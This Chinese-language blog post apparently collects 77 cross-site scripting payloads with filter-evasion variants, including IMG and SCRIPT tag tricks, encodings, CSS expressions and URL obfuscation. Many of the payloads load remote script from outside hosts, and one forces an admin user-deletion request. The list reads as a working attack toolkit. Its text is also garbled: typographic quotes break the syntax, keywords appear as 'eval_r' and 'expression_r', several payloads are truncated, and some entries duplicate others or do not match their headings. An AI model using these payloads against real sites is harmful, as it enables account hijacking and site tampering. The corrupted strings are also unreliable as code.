XSS跨站腳本攻擊匯總
4 人贊了文章
(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG標籤XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG標籤無分號無引號
<IMG SRC=javascript:alert(『XSS』)>
(4)IMG標籤大小寫不敏感
<IMG SRC=JaVaScRiPt:alert(『XSS』)>(5)HTML編碼(必須有分號)
<IMG SRC=javascript:alert(「XSS」)>(6)修正缺陷IMG標籤
<IMG 「」"><SCRIPT>alert(「XSS」)</SCRIPT>」>(7)formCharCode標籤(計算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>(8)UTF-8的Unicode編碼(計算器)
<IMG SRC=jav..省略..S)>
(9)7位的UTF-8的Unicode編碼是沒有分號的(計算器)
<IMG SRC=jav..省略..S)>(10)十六進位編碼也是沒有分號(計算器)
<IMG SRC=java..省略..XSS')>(11)嵌入式標籤,將Javascript分開
<IMG SRC=」jav ascript:alert(『XSS』);」>(12)嵌入式編碼標籤,將Javascript分開
<IMG SRC=」jav ascript:alert(『XSS』);」>(13)嵌入式換行符
<IMG SRC=」jav ascript:alert(『XSS』);」>
(14)嵌入式回車
<IMG SRC=」jav ascript:alert(『XSS』);」>(15)嵌入式多行注入JavaScript,這是XSS極端的例子
<IMG SRC=」javascript:alert(『XSS『)」>(16)解決限制字元(要求同頁面)
<script>z=』document.』</script><script>z=z+』write(「『</script><script>z=z+』<script』</script><script>z=z+』 src=ht』</script><script>z=z+』tp://ww』</script>
<script>z=z+』w.shell』</script><script>z=z+』.net/1.』</script><script>z=z+』js></sc』</script><script>z=z+』ript>」)』</script><script>eval_r(z)</script>(17)空字元
perl -e 『print 「<IMG SRC=java script:alert(」XSS」)>」;』 > out(18)空字元2,空字元在國內基本沒效果.因為沒有地方可以利用
perl -e 『print 「<SCR IPT>alert(」XSS」)</SCR IPT>」;』 > out(19)Spaces和meta前的IMG標籤
<IMG SRC=」 javascript:alert(『XSS』);」>(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=」http://3w.org/XSS/xss.js」></SCRIPT>(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert(「XSS」)>(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=」http://3w.org/XSS/xss.js」></SCRIPT>(23)雙開括弧
<<SCRIPT>alert(「XSS」);//<</SCRIPT>(24)無結束腳本標記(僅火狐等瀏覽器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>(25)無結束腳本標記2
<SCRIPT SRC=//3w.org/XSS/xss.js>(26)半開的HTML/JavaScript XSS
<IMG SRC=」javascript:alert(『XSS』)」(27)雙開角括弧
<iframe src=http://3w.org/XSS.html <(28)無單引號 雙引號 分號
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
(29)換碼過濾的JavaScript
」;alert(『XSS』);//(30)結束Title標籤
</TITLE><SCRIPT>alert(「XSS」);</SCRIPT>(31)Input Image
<INPUT SRC=」javascript:alert(『XSS』);」>(32)BODY Image
<BODY BACKGROUND=」javascript:alert(『XSS』)」>(33)BODY標籤
<BODY(『XSS』)>
(34)IMG Dynsrc
<IMG DYNSRC=」javascript:alert(『XSS』)」>(35)IMG Lowsrc
<IMG LOWSRC=」javascript:alert(『XSS』)」>(36)BGSOUND
<BGSOUND SRC=」javascript:alert(『XSS』);」>(37)STYLE sheet
<LINK REL=」stylesheet」 HREF=」javascript:alert(『XSS』);」>(38)遠程樣式表
<LINK REL=」stylesheet」 HREF=」http://3w.org/xss.css」>
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(「javascript:alert(『XSS』)」);}</STYLE><UL><LI>XSS(40)IMG VBscript
<IMG SRC=』vbscript:msgbox(「XSS」)』></STYLE><UL><LI>XSS(41)META鏈接url
<META HTTP-EQUIV=」refresh」 CONTENT=」0; URL=http://;URL=javascript:alert(『XSS』);」>(42)Iframe
<IFRAME SRC=」javascript:alert(『XSS』);」></IFRAME>(43)Frame
<FRAMESET><FRAME SRC=」javascript:alert(『XSS』);」></FRAMESET>(44)Table
<TABLE BACKGROUND=」javascript:alert(『XSS』)」>(45)TD
<TABLE><TD BACKGROUND=」javascript:alert(『XSS』)」>(46)DIV background-image
<DIV STYLE=」background-image: none)」>(47)DIV background-image後加上額外字元(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE=」background-image: none)」>(48)DIV expression
<DIV STYLE=」width: expression_r(alert(『XSS』));」>(49)STYLE屬性分拆表達
<IMG STYLE=」xss:expression_r(alert(『XSS』))」>(50)匿名STYLE(組成:開角號和一個字母開頭)
<XSS STYLE=」xss:expression_r(alert(『XSS』))」>(51)STYLE background-image
<STYLE>.XSS{background-image:none」);}</STYLE><A CLASS=XSS></A>(52)IMG STYLE方式
exppression(alert(「XSS」))』>(53)STYLE background
<STYLE><STYLE type=」text/css」>BODY{background:url(「javascript:alert(『XSS』)」)}</STYLE>(54)BASE
<BASE HREF=」javascript:alert(『XSS』);//」>(55)EMBED標籤,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=」http://3w.org/XSS/xss.swf」 ></EMBED>(56)在flash中使用ActionScrpt可以混進你XSS的代碼
a=」get」;b=」URL(」";c=」javascript:」;d=」alert(『XSS』);」)」;eval_r(a+b+c+d);(57)XML namespace.HTC文件必須和你的XSS載體在一台伺服器上
<HTML xmlns:xss><?import namespace=」xss」 implementation=」http://3w.org/XSS/xss.htc」><xss:xss>XSS</xss:xss></HTML>(58)如果過濾了你的JS你可以在圖片里添加JS代碼來利用
<SCRIPT SRC=」」></SCRIPT>(59)IMG嵌入式命令,可執行任意命令
<IMG SRC=」http://www.XXX.com/a.php?a=b」>(60)IMG嵌入式命令(a.jpg在同伺服器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser(61)繞符號過濾
<SCRIPT a=」>」 SRC=」http://3w.org/xss.js」></SCRIPT>(62)
<SCRIPT =」>」 SRC=」http://3w.org/xss.js」></SCRIPT>(63)
<SCRIPT a=」>」 」 SRC=」http://3w.org/xss.js」></SCRIPT>(64)
<SCRIPT 「a=』>』」 SRC=」http://3w.org/xss.js」></SCRIPT>(65)
<SCRIPT a=`>` SRC=」http://3w.org/xss.js」></SCRIPT>(66)
<SCRIPT a=」>』>」 SRC=」http://3w.org/xss.js」></SCRIPT>(67)
<SCRIPT>document.write(「<SCRI」);</SCRIPT>PT SRC=」http://3w.org/xss.js」></SCRIPT>(68)URL繞行
<A HREF=」http://127.0.0.1/」>XSS</A>(69)URL編碼
<A HREF=」http://3w.org」>XSS</A>(70)IP十進位
<A HREF=」http://3232235521″>XSS</A>(71)IP十六進位
<A HREF=」http://0xc0.0xa8.0×00.0×01″>XSS</A>(72)IP八進位
<A HREF=」http://0300.0250.0000.0001″>XSS</A>(73)混合編碼
<A HREF=」htt p://6 6.000146.0×7.147/」">XSS</A>(74)節省[http:]
<A HREF=」//www.google.com/」>XSS</A>(75)節省[www]
<A HREF=」http://google.com/」>XSS</A>(76)絕對點絕對DNS
<A HREF=」http://www.google.com./」>XSS</A>(77)javascript鏈接
<A HREF=」javascript:document.location=』http://www.google.com/』」>XSS</A>
我的公眾號:安全犀牛
推薦閱讀:
※如何評價2018強網杯線下賽?
※如何讓黑哥將多年的功力傳授於我?
※完整的網站滲透測試,結束前如何確保痕迹的清理?
※AI技術被黑客利用?
※黑客進攻時的屏幕是怎樣的?